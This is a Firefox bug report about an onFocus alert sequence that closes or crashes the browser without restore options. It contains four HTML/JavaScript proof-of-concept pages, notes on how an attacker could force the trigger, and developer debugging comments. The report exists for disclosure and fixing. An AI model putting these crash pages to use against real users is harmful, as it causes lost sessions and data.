640127 - If I close An Alert Started By An onFocus Event, With The [x] button on Document Load, FireFox Closes/Crashes??

Status: RESOLVED WORKSFORME

(Core :: DOM: Events, defect, P5)

Description

[cjb.exploit]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14

If An Alert/Prompt/Confirm or Wrong Protocol Error-Alert Is Activated With An onFocus Event in the <BODY>.
If The First Prompt Is Closed With The [x] button, 
Focus Taken Away From FireFox, 
Clicking {OK} or [x] On The Next Alert/Prompt/Confirm or Wrong Protocol Error-Alert. 
Causes FireFox To Close/Crash? Its Tabs And Windows With No Restore Options Available on Restart.

Reproducible: Always

Steps to Reproduce:
I Have Managed To Repoduce This In The Below Script/POC's

------------------------Main-POC------------------------------

<body onFocus='JavaScript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ;
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) alert("Clicking [x] Primes The Crash?");
}
};'><input type='hidden' id='counter' value='2'></body>

------------------------EOF-MainPOC---------------------------

--------------------------POC1--------------------------------

1.open POC1 Follow Steps
1a. Click [x]
1b. Click {OK} or [x]


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
</head>
<body onFocus='JavaScript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ;
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) alert("Clicking [x] Primes The Crash? \n"+
"Attacker Could Use About 80+ \\n To Force [x]"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
}
};'>
<input type='hidden' id='counter' value='2'>
</body>
</html>

--------------------------EOF-POC1----------------------------

----------------------------POC2------------------------------

2.open POC2 Follow Steps {This Effects 4.12b }
1a. Click [x]
1b. Click {OK} or [x]

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
</head>
<body onFocus='javascript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ; 
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) document.getElementById( "Target" ).src="FORCETHEPRESSOFXzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:";
}
};'>
<iframe id="Target" src='' 
name="Target" 
width="0"
height="0">
</iframe>
<input type='hidden' id='counter' value='2'>
</body>
</html>

--------------------------EOF-POC2----------------------------

----------------------------POC3------------------------------

3.open POC3 Follow Steps {This Example Dosent Work For latest Beta But Could}
3a. Click ModdalDialog
3b. Click [x]
3c. Click {OK} or [x]
3d. Close Dialog

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title></title></head>
<body>
<center>
<input type='button' value='Modal-Dialog'
onClick='javascript:{
var Inject = document.getElementById("InjectString").value;
var Header = document.getElementById("Modal_Header").value;
window.showModalDialog( Header + Inject,
"Arguments",
"edge: Raised; "+
"center: No; "+
"status: No; "+
"resizable: No; "+
"dialogTop: 286px; "+
"dialogLeft: 998px; "+
"dialogWidth: 1214px; "+
"dialogHeight: 405px; ")}'>
</center>
<input id='Modal_Header'
type='hidden'
value="data:text/html;charset=utf-8,">
<input id='InjectString'
type='hidden'  
value="<html><body onFocus='JavaScript:{cjb = new Number( document.getElementById( &#34;counter&#34; ).value );document.getElementById( &#34;counter&#34; ).value = ( cjb - 1 );{if ( cjb == 0 ) Create( &#34;Error&#34;, &#34;inErrorConsoleo&#34; );}{if ( cjb == 1 ) alert( &#34;Click {ok} Or [x]&#34; );}{if ( cjb == 2 ) alert( &#34;Clicking [x] Primes The Crash? \n&#34;+&#34;Attacker Could Use About 80+ \\n To Force [x]&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;);}};'><input type=hidden id=counter value=2></body></html>">
</body>
</html>

--------------------------EOF-POC3----------------------------

This Snip Alerts A Message After Application Closes/Crashes

----------------------------POC4------------------------------
<body onFocus='JavaScript:{ 
x = new Number( document.getElementById( "counter" ).value );
if ( x == 0 ) CreateError( InErrorConsole );
else
document.getElementById( "counter" ).value = ( x - 1 );
alert( "press [x] " + x + " more times" ); 
};'
onLoad='JavaScript:{alert("Crash Or Close?")};'>
<input type='hidden' id='counter' value='2'></body>
--------------------------EOF-POC4----------------------------
Actual Results:  
FireFox Closed or Crashed 
With No Warnings Or Options To Restore Windows, Tabs And Data

Expected Results:  
Not Crash/Close.
Warnings.
Restore Options.

If Two Windows Are Open (errorconsole,bookmarks etc...) Closing The Second Window With [x] Causes The Close/Crash.

If Sequence called in modaldialog On the Close Of The dialog window With [x] FireFox Closes/Crashes All Tabs/Windows depending On How Many Are open {POC3}.

Tested With The Latest Beta release 4.12b,
Didnt Work At First But An Alert Dialog Can Still Be Ativated with { Wrong Protocol Error-Alert {POC2} } So Also Effects The Latest Beta release
note: Beta 4.12b Dose Have option To Restore On Home Page and Warns On Multi Tab close.

Comment 1

[Mats Palmgren (inactive)]

Please use the "Add an attachment" link on the bug report to upload
your files. Thanks.

Comment 2

[cjb.exploit]

Attachment: Main POC Script Example

Comment 3

[cjb.exploit]

Attachment: POC-1

Comment 4

[cjb.exploit]

Attachment: POC-2 effects 4.0b12 & 3.6.14

Comment 5

[cjb.exploit]

Attachment: POC-3 modal-dialog Example

Comment 6

[cjb.exploit]

Attachment: POC-4 Alert After Crash/Close

Comment 7

[cjb.exploit]

(In reply to comment #1)
> Please use the "Add an attachment" link on the bug report to upload
> your files. Thanks.

Example Files Uploaded :)

Comment 8

[Daniel Veditz [:dveditz]]

I do not see a problem on Mac. There's no 'x' button to close the modal dialogs, but "Esc" is supposed to do the equivalent.

On a windows machine I can reproduce the problem by clicking the built-in "x" close-window button, but not if I hit Esc to cancel the first dialog. Why would that be any different? When it goes down it goes down fast -- no crash reporter comes up.

Didn't have a newer windows debug build than 3.5.x handy, but in that version I get the following assertions before the crash:

Somewhat early
WARNING: requested removal of nonexistent window: nsWindowWatcher.cpp, line 1220

a few (4)
WARNING: getting z level of unregistered window: nsWindowMediator.cpp, lin 635

Then
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413
ASSERTION: Uh, LeaveModalState() called w/o a reachable top window?: 'Error', nsGlobalWindow.com, line 4514
WARNING: NS_ENSURE_SUCCESS(rv, 0) failed with result 0x8000FFFF: nsContentUtils.cpp, line 2717
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413

Remember those line numbers are from a really old build.

Comment 9

[Daniel Veditz [:dveditz]]

Kind of looks like we're shutting down on purpose, cleanly. After the assertions I see some of the usual shutdown assertions and the "--DOMWINDOW == XX" debug spew cleanly counting down as objects are freed

Comment 10

[Mats Palmgren (inactive)]

I don't see any problem in Firefox 3.6.15 on Linux.
No problem in local (Linux x86-64) 1.9.2 debug build either.

In a local (Linux x86-64) mozilla-central debug build I saw a few
###!!! ASSERTION: Some mouse button down events are nested?: '!aDocument || !mMouseDownEventHandlingDocument', file dom/base/nsFocusManager.h, line 99
###!!! ASSERTION: mArguments wasn't cleaned up properly!: '!mArguments', file dom/base/nsGlobalWindow.cpp, line 993
but no problem other than that.

I will try on Win XP too...

Comment 11

[Daniel Veditz [:dveditz]]

(In reply to comment #8)
> Didn't have a newer windows debug build than 3.5.x handy [...]

Just to be clear, 3.5.x only applied to the debug version. I also reproduced on 3.6.16pre and (with POC-2) 4.0b12 on Windows.

Comment 12

[Mats Palmgren (inactive)]

Attachment: stack

I can reproduce the bug on Windows XP.  Here's a stack with a breakpoint
in nsGlobalWindow::Close() - it appears we have nested modal loops here.
I suspect this is the root cause of the bug.  The difference between
Windows and other platforms could be focus handling.

It doesn't look like a security issue though.  I think the worst that could
happen is data loss - losing your session, preferences, bookmarks etc.

Comment 13

[Firefox Bug Husbandry Bot]

https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and has no one currently assigned to P5.

If you have questions, please contact :mdaly.

Comment 14

[Andrei Purice]

Closing this issue as Resolved > Worksforme since none of the attached files (after following the given steps) crash any of the latest versions of Firefox Nightly, beta or release on Windows 10.